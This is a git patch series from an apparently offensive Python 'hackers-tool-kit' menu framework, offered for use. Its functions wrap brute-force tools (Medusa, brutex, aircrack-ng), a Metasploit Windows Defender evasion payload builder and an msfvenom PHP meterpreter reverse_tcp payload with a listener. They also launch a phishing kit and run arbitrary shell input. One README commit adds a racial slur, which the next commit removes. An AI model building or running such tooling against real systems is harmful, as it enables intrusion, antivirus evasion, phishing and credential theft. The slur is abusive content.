hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From d1151c83cfcc06214911f6dd7fa2726f19ae21c1 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 15 May 2019 16:15:31 +0100 Subject: [PATCH 124/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7dc4ec5..cbc486e 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # hackers-tool-kit Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making im still adding more stuff to see updates check on -my instagram @tuf_unkn0wn +my instagram @tuf_unkn0wn nigger ![](tools/screenshot1.png) From 2e581bb767bd49515bfae088944a9bb6dfd5dbff Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 15 May 2019 16:17:23 +0100 Subject: [PATCH 125/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index cbc486e..7dc4ec5 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # hackers-tool-kit Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making im still adding more stuff to see updates check on -my instagram @tuf_unkn0wn nigger +my instagram @tuf_unkn0wn ![](tools/screenshot1.png) From e35087054e3da0cf69b0af5c09079eee716f5e57 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 15 May 2019 16:54:54 +0100 Subject: [PATCH 126/214] Add files via upload --- update.py | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 update.py diff --git a/update.py b/update.py new file mode 100644 index 0000000..ff5606d --- /dev/null +++ b/update.py @@ -0,0 +1,4 @@ +import os +print "UPDATING..." +os.system("cd") +os.system('cd /root/ && rm -fr hackers-tool-kit && git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit && echo "[UPDATED]: Restart Your Terminal"') \ No newline at end of file From 880e9c04083d7fd43b9663de7a99ddeecd699df0 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 15 May 2019 16:55:45 +0100 Subject: [PATCH 127/214] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 7dc4ec5..25d8523 100644 --- a/README.md +++ b/README.md @@ -49,7 +49,6 @@ this is where i will try to put the most recent updates -* added a clearall and a run option * everytime you run the script it will switch randomly between different banners @@ -57,3 +56,5 @@ this is where i will try to put the most recent updates also added more banners * added a phpload option + +* added a update file From 3c049109ab3d4428d9602a64ae218f91df66e067 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 15 May 2019 16:56:03 +0100 Subject: [PATCH 128/214] Delete update.py --- update.py | 4 ---- 1 file changed, 4 deletions(-) delete mode 100644 update.py diff --git a/update.py b/update.py deleted file mode 100644 index ff5606d..0000000 --- a/update.py +++ /dev/null @@ -1,4 +0,0 @@ -import os -print "UPDATING..." -os.system("cd") -os.system('cd /root/ && rm -fr hackers-tool-kit && git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit && echo "[UPDATED]: Restart Your Terminal"') \ No newline at end of file From eae78a109408653ddb729d92a5c49cd5924a79d3 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 15 May 2019 16:56:34 +0100 Subject: [PATCH 129/214] Add files via upload --- htkupdate.py | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 htkupdate.py diff --git a/htkupdate.py b/htkupdate.py new file mode 100644 index 0000000..ff5606d --- /dev/null +++ b/htkupdate.py @@ -0,0 +1,4 @@ +import os +print "UPDATING..." +os.system("cd") +os.system('cd /root/ && rm -fr hackers-tool-kit && git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit && echo "[UPDATED]: Restart Your Terminal"') \ No newline at end of file From ba93738e86fd62d137df6d7dffcde28c98058dac Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 17 May 2019 00:05:24 +0100 Subject: [PATCH 130/214] Delete htk.py --- htk.py | 2740 -------------------------------------------------------- 1 file changed, 2740 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 5c3ae9e..0000000 --- a/htk.py +++ /dev/null @@ -1,2740 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 